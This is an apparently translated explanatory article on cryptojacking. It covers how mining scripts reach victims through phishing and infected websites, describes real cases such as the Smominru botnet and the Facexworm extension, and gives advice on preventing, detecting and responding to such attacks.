Understand "mining hijacking" in one article and refuse to become a "free miner"

Cryptojacking, also known as cryptojacking, is the unauthorized use of someone else's computer to mine for cryptocurrency.

Typically, hackers load cryptocurrency mining code onto a computer by getting the victim to click on a malicious link in an email, or by infecting a website or online ad with JavaScript code that automatically executes once loaded within the victim's browser.

Either way, the mining code will run in the background while the unsuspecting victim can use their computer normally. The only sign they might notice is a drop in computer performance or execution lag.

Why do mining hijacking incidents occur so frequently?

No one knows how much cryptocurrency hackers have mined through cryptojacking, but there is no doubt that the practice is growing.

Browser-based cryptojacking is growing rapidly. In November last year, Adguard reported a 31% increase in in-browser cryptojacking. Adguard research found that there were 33,000 websites running cryptojacking scripts, and the number of visits to these websites per month was estimated to reach 1 billion. In February of this year, Bad Packets Report found 34,474 sites running Coinhive. Coinhive is the most popular JavaScript mining program, which is also used for legal cryptocurrency mining activities.

“Cryptocurrency mining is in its infancy and there is a lot of room for development and evolution,” said Marc Laliberte, a threat intelligence analyst at WatchGuard Technologies, a provider of cybersecurity solutions. He noted that the Coinhive program was easy to deploy and generated $300,000 in value in its first month.

“From there, Coinhive grew really fast. It was really easy to make money this way.”

In January, researchers discovered the Smominru cryptocurrency mining botnet, which infected more than 500,000 machines, mainly in Russia, India, and Taiwan. The botnet targets Windows servers to mine Monero. Cybersecurity firm Proofpoint estimates that it has generated $3.6 million in value by the end of January.

Cryptojacking doesn’t even require significant technical skills. According to Digital Shadows’ report “The New Gold Rush: Cryptocurrency Emerges as a New Frontier for Fraud,” cryptojacking kits can be found on the dark web for as little as $30.

One reason cryptojacking is becoming more popular with hackers is that it offers lower risk and more money. "For hackers, cryptojacking is a cheaper and more profitable alternative to ransomware," said Alex Vaystikh, CTO and co-founder of SecBI. With ransomware, hackers can infect 100 computers at a time and perhaps only get three people to pay. With cryptojacking, all 100 infected computers can be used to mine cryptocurrency. He explained that while the money earned from cryptojacking and ransomware may be the same, mining can generate value over time.

In addition, the risk of discovery and identification of mining hijacking is much lower than that of ransomware. The mining code will run silently and may not be discovered for a long time; even if it is discovered, it is difficult to trace the source. Because nothing is stolen or encrypted, the victim has little motivation to trace it. Hackers tend to choose anonymous cryptocurrencies such as Monero and Zcash instead of Bitcoin because it is difficult to track the illegal activities behind these currencies.

How does mining hijacking happen?

There are two main ways hackers can get a victim's computer to quietly mine cryptocurrency.

One method is to trick the victim into loading the mining code onto their computer. This is done through a method similar to phishing: the victim receives a legitimate-looking email that tricks them into clicking a link. This link runs code that loads the mining script onto the computer. The mining script code can run in the background while the victim is using the computer.

Another method is to embed a script in a website or advertisement that can be spread widely. Once the victim visits the infected website or clicks on an ad that pops up in the browser, the script will automatically execute. No code is stored on the victim's computer.

Regardless of the method used, the mining code uses the victim's computer to mine cryptocurrencies and sends the results to a server controlled by the hacker.

Hackers often use both methods to maximize their returns. "Attackers use malware techniques as a fallback to deliver more reliable and persistent malware to the victim's computer," Vaystikh said. For example, of 100 devices mining cryptocurrency for a hacker, 10% of them might generate revenue through code on the victim's device, and 90% through their web browser.

Unlike most other types of malware, cryptojacking scripts do not harm the computer or the victim's data. Instead, they steal CPU processing resources. For individual users, slower computer performance may be just an annoyance. For businesses, however, if many systems are hijacked for crypto mining, it may increase costs. To resolve the problem, the help desk and IT department need to spend time tracking down performance issues and replacing components or systems.

Actual case of mining hijacking

Cryptojackers are smart and have devised many schemes to exploit other people’s computers to mine cryptocurrencies. Most of these schemes are not new and are usually spread in ways that borrow from other malware, such as ransomware or adware. Here are some real-life examples:

Rogue employees hijack company systems

At this year's EmTech digital conference, Darktrace told the story of a European bank whose servers were experiencing unusual traffic and running slowly overnight, but the bank's diagnostic tools didn't pick up anything out of the ordinary. Darktrac discovered that new servers had come online during that time, which the bank said it didn't have. Finally, a physical inspection of the data center by Darktrac revealed that a rogue employee had built a cryptocurrency mining system under the floor.

Using GitHub to spread mining software

In March, Avast Software reported that cryptojackers were using GitHub as a host for malicious cryptominers. They found legitimate projects and created a fork of them; then they hid the malware in the directory structure of the forked project. Cryptojackers lure users to download the malware by using phishing schemes, such as reminders to update Flash Player or disguised as an adult game website.

Exploiting rTorrent Vulnerabilities

Cryptojackers discovered an rTorrent misconfiguration vulnerability that allowed access to some rTorrent clients without XML-RPC communication authentication. They scanned the internet for unpatched clients and then deployed Monero mining software on them. F5 Networks reported the vulnerability in February and advised rTorrent users to ensure that their clients do not accept external connections.

Facexworm, a malicious Chrome extension

The malware was first discovered by Kaspersky Lab in 2017 as a Google Chrome extension that used Facebook Messenger to infect users' computers. Initially, Facexworm was used to spread adware. Earlier this year, Trend Micro discovered multiple strains of Facexworm that targeted cryptocurrency exchanges and were capable of spreading cryptocurrency mining code. It still uses infected Facebook accounts to spread malicious links, but can also steal network accounts and credentials, allowing it to implant mining hijacking code into these web pages.

Violent mining virus WinstarNssmMiner

In May, 360 Security Guards discovered WinstarNssmMiner, a mining hijacking program that can spread rapidly. The special thing about this malicious program is that uninstalling it will crash the victim's computer. WinstarNssmMiner first starts the svchost.exe process and implants code into it, and then sets the property of the process to CriticalProcess. Since the computer regards it as a critical process, once the process is forcibly terminated, the computer will blue screen.

How to prevent mining hijacking?

If you follow these steps, you can minimize the risk of your company being hijacked for mining:

• Corporate security awareness training should include content about the threat of cryptojacking, with an emphasis on the way cryptojacking scripts are loaded onto user computers via phishing.

Laliberte believes that training will help, and phishing will continue to be the main way attackers deliver various malware. As for the method of automating mining hijacking by visiting legitimate websites, Vaystikh said that training is not effective because you can't tell users which websites they can't visit.

• Install ad blocking or anti-mining plugins on your web browser.

Since cryptojacking scripts are often spread through online ads, installing an ad blocker may be an effective way to block them. Ad blockers such as Ad Blocker Plus have the ability to detect cryptojacking scripts. Laliberte recommends browser plugins such as No Coin and MinerBlock that can detect and block cryptojacking scripts.

• Use endpoint protection technology that can detect known miners.

Many endpoint protection/antivirus software vendors have added the ability to detect mining programs. "Antivirus is one of the ways to prevent mining hijacking on the endpoint. If the program is known, it is likely to be detected," said Travis Farral, director of security strategy at Anomali. He added that it is important to note that the writers of mining programs are constantly changing their techniques to avoid being detected by the endpoint.

• Update web filtering tools.

If you have determined that a website is running a mining script, make sure all users no longer access the website.

• Maintain browser plugins.

Some attackers are using malicious browser plugins or infected legitimate plugins to execute cryptocurrency mining scripts.

• Use a mobile device management (MDM) solution to better control content on user devices.

Bring Your Own Device (BYOD) policies can effectively prevent illegal cryptocurrency mining. Laliberte believes that MDM can keep BYOD devices safe in the long run. MDM solutions can help companies manage applications and plug-ins on user devices. MDM solutions tend to be targeted at large enterprises and are usually unaffordable for small businesses. However, Laliberte pointed out that mobile devices are not as dangerous as desktop computers and servers. Because mobile devices tend to have lower processing power, they are not very profitable for hackers.

How to detect mining hijacking?

As with ransomware, despite your best efforts to prevent cryptojacking, you may still be affected. Cryptojacking can be difficult for an organization to detect, especially when only a few systems are compromised. Here are some effective methods:

• Train the help desk to detect signs of cryptojacking.

Sometimes, the first sign of a cryptojacking attack is a help desk complaint from a user about slow computer performance, SecBI's Vaystikh said. Companies should take that seriously and investigate further.

Other signs the help desk should look for are system overheating, which could lead to CPU or cooling fan failure. Laliberte points out that system overheating can cause damage and potentially shorten the life of the device due to high CPU usage. This is especially true for mobile devices such as tablets and smartphones.

• Deploy a network monitoring solution.

Vaystikh believes that cryptojacking in enterprise networks is easier to detect than home networks because most consumer endpoint solutions cannot detect it. Cryptojacking is easily detected by network monitoring solutions, and most enterprises have network monitoring tools.

However, even with network monitoring tools and data, few companies have the tools and capabilities to analyze this information for accurate detection. For example, SecBI has developed an AI solution to analyze network data and detect mining hijacking and other specific threats.

Laliberte believes that network monitoring is the best option for detecting cryptojacking. Network perimeter monitoring solutions that review all network traffic are more likely to detect mining activities. Many monitoring solutions will deeply monitor each user in order to determine which devices are affected.

Farral said that if enterprise servers are equipped with reliable filters to monitor network connection requests at exit endpoints, malicious mining software can be detected well. However, he warned that miner programmers have the ability to rewrite the malware to evade this detection method.

• Monitor your website to see if it has been implanted with mining hijacking code.

Farral warned that cryptojackers are trying to plant some Javascript code on web servers. The server itself is not the target of their attack, but anyone who visits the website is at risk of infection. He recommended that companies regularly monitor file changes on web servers or change the pages themselves.

• Stay up to date on cryptojacking trends.

The way cryptojacking is spread and the mining code itself is constantly evolving. Farral said that understanding the cryptojacking software and the hijacking behavior can help companies detect cryptojacking. A smart company will follow the latest developments. If you understand the propagation mechanism of cryptojacking, you know that a specific development kit is sending mining code. Protecting the development kit will also become a measure to prevent cryptojacking.

How to deal with mining hijacking attacks?

• Close and block malicious scripts sent by websites.

For in-browser JavaScript hijacking attacks, once mining hijacking is detected, the browser tab running the malicious script should be closed. IT departments should pay attention to the website URL that sends the script and update the company's web filters to intercept it. Enterprises can consider deploying anti-mining tools to help prevent future attacks.

• Update and clean browser add-ons.

Laliberte said that if a plugin infects your browser, closing the tab won't help. You should update all plugins and remove any that are no longer needed or that are already infected.

• Learn and adapt.

Use these lessons to better understand how attackers compromise systems. Update your user, help desk, and IT training so they can better identify cryptojacking and take appropriate action.